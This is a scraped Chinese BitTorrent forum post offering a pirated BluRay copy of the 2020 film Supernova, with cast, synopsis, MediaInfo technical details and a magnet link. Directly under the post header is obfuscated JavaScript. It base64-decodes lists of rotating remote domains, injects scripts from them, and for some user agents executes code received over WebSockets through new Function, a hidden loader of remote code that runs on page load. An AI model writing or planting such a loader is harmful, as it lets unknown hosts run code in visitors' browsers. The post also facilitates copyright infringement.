超新星[简繁字幕]Supernova.2020.1080p.BluRay.x264.DTS-迅雷下载 8.83GB

版主小s 15天前 281

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 超新星 / 在星空尽头等你(港) / 永远的我们(台)

◎片 名 Supernova

◎年 代 2020

◎产 地 英国

◎类 别 爱情 / 同性

◎语 言 英语

◎上映日期 2020-09-24(圣塞巴斯蒂安电影节) / 2021-01-29(美国) / 2021-02-16(美国网络) / 2021-03-05(英国)

◎IMDb链接 https://www.imdb.com/title/tt11169050/

◎豆瓣评分 7.3/10 (2766人评价)

◎豆瓣链接 https://movie.douban.com/subject/34869441/

◎片 长 95分钟

◎导 演 哈里·麦昆 Harry Macqueen (id:1442514)

◎编 剧 哈里·麦昆 Harry Macqueen (id:1442514)

◎演 员 科林·费尔斯 Colin Firth (id:1031223)

斯坦利·图齐 Stanley Tucci (id:1040517)

皮帕·海伍德 Pippa Haywood (id:1099604)

彼得·麦昆 Peter MacQueen (id:1450753)

妮娜·马林 Nina Marlin (id:1450754)

伊恩·德赖斯代尔 Ian Drysdale (id:1450755)

莎拉·伍德沃德 Sarah Woodward (id:1163128)

詹姆斯·德雷福斯 James Dreyfus (id:1087457)

洛丽·坎贝尔 Lori Campbell (id:1450756)

丹妮卡·埃切尔斯 Daneka Etchells (id:1450757)

哈勒玛·侯赛因 Halema Hussain (id:1450758)

朱莉·汉南 Julie Hannan (id:1415859)

约翰·艾伦·罗伯茨 John Alan Roberts (id:1442711)

特拉福斯 Truffles (id:1451902)

迪克·蒲波 Dick Pope (id:1276566)

◎标 签 英国 / 同性 / 爱情 / LGBT / 2020 / 剧情 / 同志 / LGBTQ

◎简 介

萨姆与塔斯克(费斯与图奇分饰)是一对相守20年的伴侣,俩人计划驱车穿越英格兰探访朋友、家人和过去待过的地方。自两年前塔斯克被诊断出患有早发性痴呆以来,他们在一起的时间便成了他们之间最重要的事。但是随着旅程的进行,他们对于未来的想法充满冲突,过往的秘密也不断涌现,并且他们对彼此的爱从未像现在这样受到考验。最终,他们还必须面对这样一个问题:面对塔斯克的疾病,彼此相爱意味着什么。

◎获奖情况 (共1项)

第68届圣塞巴斯蒂安国际电影节 (2020)

金贝壳奖(提名)

└──哈里·麦昆 (id:1442514)

  1. General

  2. Unique ID : 249187775169198325552305150612552685655 (0xBB77D1DE3D5F9C42622E4B7786F21857)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.82 GiB

  7. Duration : 1 h 35 min

  8. Overall bit rate : 13.3 Mb/s

  9. Encoded date : UTC 2021-07-10 09:15:06

  10. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 35 min

  22. Bit rate : 11.7 Mb/s

  23. Width : 1 920 pixels

  24. Height : 1 036 pixels

  25. Display aspect ratio : 1.85:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.245

  33. Stream size : 7.77 GiB (88%)

  34. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.5000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 35 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.00 GiB (11%)

  54. Language : English

  55. Default : Yes

  56. Forced : No


  57. Text #1

  58. ID : 3

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 26 min

  64. Bit rate : 33.4 kb/s

  65. Count of elements : 1908

  66. Stream size : 20.7 MiB (0%)

  67. Title : 简英

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No


  71. Text #2

  72. ID : 4

  73. Format : PGS

  74. Muxing mode : zlib

  75. Codec ID : S_HDMV/PGS

  76. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  77. Duration : 1 h 26 min

  78. Bit rate : 33.6 kb/s

  79. Count of elements : 1908

  80. Stream size : 20.9 MiB (0%)

  81. Title : 繁英

  82. Language : Chinese

  83. Default : No

  84. Forced : No


  85. Text #3

  86. ID : 5

  87. Format : PGS

  88. Muxing mode : zlib

  89. Codec ID : S_HDMV/PGS

  90. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  91. Duration : 1 h 26 min

  92. Bit rate : 20.7 kb/s

  93. Count of elements : 1908

  94. Stream size : 12.9 MiB (0%)

  95. Title : 简中

  96. Language : Chinese

  97. Default : No

  98. Forced : No


  99. Text #4

  100. ID : 6

  101. Format : PGS

  102. Muxing mode : zlib

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 1 h 26 min

  106. Bit rate : 21.0 kb/s

  107. Count of elements : 1908

  108. Stream size : 13.0 MiB (0%)

  109. Title : 繁中

  110. Language : Chinese

  111. Default : No

  112. Forced : No


  113. Text #5

  114. ID : 7

  115. Format : PGS

  116. Muxing mode : zlib

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 29 min

  120. Bit rate : 50.9 kb/s

  121. Count of elements : 2298

  122. Stream size : 32.6 MiB (0%)

  123. Title : 英语

  124. Language : English

  125. Default : No

  126. Forced : No


  127. Menu

  128. 00:00:00.000 : 绗?01 绔?

  129. 00:10:07.315 : 绗?02 绔?

  130. 00:22:09.954 : 绗?03 绔?

  131. 00:30:07.347 : 绗?04 绔?

  132. 00:40:25.089 : 绗?05 绔?

  133. 00:51:30.963 : 绗?06 绔?

  134. 01:00:17.697 : 绗?07 绔?

  135. 01:13:07.216 : 绗?08 绔?

  136. 01:19:37.439 : 绗?09 绔?

  137. 01:29:39.165 : 绗?10 绔?


TAGS 剧情 同性

磁力链:
  • magnet:?xt=urn:btih:F277535B7C1738ED994F4AADDEC408296130BEB5
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回